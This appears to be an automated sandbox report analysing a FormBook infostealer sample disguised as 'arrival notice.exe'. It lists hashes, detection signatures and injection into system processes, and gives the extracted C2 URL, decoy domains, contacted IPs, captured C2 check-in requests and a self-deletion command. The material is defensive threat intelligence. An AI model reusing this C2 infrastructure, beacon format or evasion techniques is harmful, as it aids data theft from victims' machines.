Windows Analysis Report arrival notice.exe

Overview

General Information

Sample Name: arrival notice.exe
Analysis ID: 483574
MD5: 692c22c9579ce47100a87e90f911b202
SHA1: 29189325967d4716883edabb4c03a5a30d836896
SHA256: 3f383c683795d277510e0fb4c806ae17bfb33dd6ff875b66c159068e58c28818
Tags: exe, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • arrival notice.exe (PID: 6224 cmdline: 'C:\Users\user\Desktop\arrival notice.exe' MD5: 692C22C9579CE47100A87E90F911B202)
    • arrival notice.exe (PID: 6400 cmdline: C:\Users\user\Desktop\arrival notice.exe MD5: 692C22C9579CE47100A87E90F911B202)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 6788 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 6256 cmdline: /c del 'C:\Users\user\Desktop\arrival notice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nordicbatterybelt.net/n58i/"], "decoy": ["southerncircumstance.com", "mcsasco.com", "ifbrick.com", "societe-anonyme.net", "bantank.xyz", "dogecoin.beauty", "aboutacoffee.com", "babalandlordrealestate.com", "tintgta.com", "integrity.directory", "parwnr.icu", "poltishof.online", "stayandstyle.com", "ickjeame.xyz", "currentmotors.ca", "pond.fund", "petrosterzis.com", "deadbydaylightpoints.com", "hotel-balzac.paris", "focusmaintainance.com", "odeonmarket.com", "voeran.net", "lookailpop.xyz", "sashaignatenko.com", "royalgreenvillage.com", "airbhouse.com", "zl-dz.com", "fuwuxz.com", "wugupihuhepop.xyz", "zmdhysm.com", "luchin.site", "rnchaincvkbip.xyz", "fffddfrfqffrtgthhhbhffgfr.com", "goabbasoon.info", "booyahbucks.com", "ilovecoventry.com", "components-electronics.com", "advindustry.com", "browandline.com", "hotnspicy.site", "marlonj26.com", "holidays24.net", "starworks.online", "mbchaindogbbc.xyz", "3wouqg.com", "evnfreesx.com", "baureihe51.com", "hycelassetmanagement.space", "photostickomni-trendyfinds.com", "singisa4letterword.com", "thklw.online", "menramen.com", "highspeedinternetinc.com", "beerenhunger.info", "hisensor.world", "lassurancevalence.com", "clementchanlab.com", "customia.xyz", "alysvera-centroestetico.com", "cx-xiezuo.com", "index-mp3.com", "mybenefits51.com", "vyhozoi.site", "lingerista.net"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      3.2.arrival notice.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      3.2.arrival notice.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      3.2.arrival notice.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      3.2.arrival notice.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      3.2.arrival notice.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook
          Yara detected FormBook
          Source: Yara match, File source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 3.2.arrival notice.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: arrival notice.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: arrival notice.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: colorcpl.pdbGCTL source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe, 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe
          Source: C:\Users\user\Desktop\arrival notice.exe, Code function: 4x nop then pop edi, 3_2_0041625A
          Source: C:\Users\user\Desktop\arrival notice.exe, Code function: 4x nop then pop edi, 3_2_0040C3D2
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 4x nop then pop edi, 10_2_0097625A
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 4x nop then pop edi, 10_2_0096C3D2

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49819 -> 217.160.0.150:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49819 -> 217.160.0.150:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49819 -> 217.160.0.150:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Domain query: www.beerenhunger.info
          Source: C:\Windows\explorer.exe, Domain query: www.ilovecoventry.com
          Source: C:\Windows\explorer.exe, Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe, Domain query: www.mybenefits51.com
          Source: C:\Windows\explorer.exe, Network Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exe, Domain query: www.singisa4letterword.com
          Source: C:\Windows\explorer.exe, Domain query: www.petrosterzis.com
          Source: C:\Windows\explorer.exe, Network Connect: 217.160.0.150 80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.nordicbatterybelt.net/n58i/
          Source: Joe Sandbox View, ASN Name: AS-26496-GO-DADDY-COM-LLCUS
          Source: global traffic, HTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1, Host: www.ilovecoventry.com, Connection: close
          Source: global traffic, HTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1, Host: www.ilovecoventry.com, Connection: close
          Source: global traffic, HTTP traffic detected: GET /n58i/?vbOlS=UboLn&jrU4NBtp=T43/QHtHCDAxgurMA2nnAzm7cVxOj31InS0qjlwJ5pTUrF8t/fgh9WgQ4TT9zfTSmLODbJhfnA== HTTP/1.1, Host: www.beerenhunger.info, Connection: close
          Source: global traffic, HTTP traffic detected: GET /n58i/?jrU4NBtp=kluGknW3JYulth+FZOKNGJWFLrjrg7vx1WPWThgYE53lU0Uyu20JwynqYY4FZ9Ej1j1u7QgdhQ==&vbOlS=UboLn HTTP/1.1, Host: www.singisa4letterword.com, Connection: close
          Source: Joe Sandbox View, IP Address: 198.185.159.144
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Content-Type: text/html, Content-Length: 601, Connection: close, Date: Wed, 15 Sep 2021 07:24:30 GMT, Server: Apache
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
          Source: unknown, DNS traffic detected: queries for: www.petrosterzis.com

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample, Static PE information: Filename: arrival notice.exe
          .NET source code contains very large strings
          Source: arrival notice.exe, Form1.cs, Long String: Length: 38272
          Source: 1.2.arrival notice.exe.220000.0.unpack, Form1.cs, Long String: Length: 38272
          Source: 1.0.arrival notice.exe.220000.0.unpack, Form1.cs, Long String: Length: 38272
          Source: 3.0.arrival notice.exe.ac0000.0.unpack, Form1.cs, Long String: Length: 38272
          Source: 3.2.arrival notice.exe.ac0000.1.unpack, Form1.cs, Long String: Length: 38272
          Source: arrival notice.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04B4B150 appears 35 times
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004185D0 NtCreateFile,3_2_004185D0
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00418680 NtReadFile,3_2_00418680
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00418700 NtClose,3_2_00418700
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004187B0 NtAllocateVirtualMemory,3_2_004187B0
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004185CA NtCreateFile,3_2_004185CA
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041867C NtReadFile,3_2_0041867C
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004186FB NtClose,3_2_004186FB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004187AC NtAllocateVirtualMemory,3_2_004187AC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04B89860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89840 NtDelayExecution,LdrInitializeThunk,10_2_04B89840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B899A0 NtCreateSection,LdrInitializeThunk,10_2_04B899A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B895D0 NtClose,LdrInitializeThunk,10_2_04B895D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04B89910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89540 NtReadFile,LdrInitializeThunk,10_2_04B89540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B896E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_04B896E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B896D0 NtCreateKey,LdrInitializeThunk,10_2_04B896D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04B89660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89650 NtQueryValueKey,LdrInitializeThunk,10_2_04B89650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A50 NtCreateFile,LdrInitializeThunk,10_2_04B89A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89780 NtMapViewOfSection,LdrInitializeThunk,10_2_04B89780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89FE0 NtCreateMutant,LdrInitializeThunk,10_2_04B89FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89710 NtQueryInformationToken,LdrInitializeThunk,10_2_04B89710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B898A0 NtWriteVirtualMemory,10_2_04B898A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B898F0 NtReadVirtualMemory,10_2_04B898F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89820 NtEnumerateKey,10_2_04B89820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8B040 NtSuspendThread,10_2_04B8B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B895F0 NtQueryInformationFile,10_2_04B895F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B899D0 NtCreateProcessEx,10_2_04B899D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8AD30 NtSetContextThread,10_2_04B8AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89520 NtWaitForSingleObject,10_2_04B89520
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89560 NtWriteFile,10_2_04B89560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89950 NtQueueApcThread,10_2_04B89950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A80 NtOpenDirectoryObject,10_2_04B89A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A20 NtResumeThread,10_2_04B89A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89610 NtEnumerateValueKey,10_2_04B89610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A10 NtQuerySection,10_2_04B89A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A00 NtProtectVirtualMemory,10_2_04B89A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89670 NtQueryInformationProcess,10_2_04B89670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8A3B0 NtGetContextThread,10_2_04B8A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B897A0 NtUnmapViewOfSection,10_2_04B897A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89730 NtQueryVirtualMemory,10_2_04B89730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8A710 NtOpenProcessToken,10_2_04B8A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89B00 NtSetValueKey,10_2_04B89B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89770 NtSetInformationFile,10_2_04B89770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8A770 NtOpenThread,10_2_04B8A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89760 NtOpenProcess,10_2_04B89760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009785D0 NtCreateFile,10_2_009785D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00978680 NtReadFile,10_2_00978680
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009787B0 NtAllocateVirtualMemory,10_2_009787B0
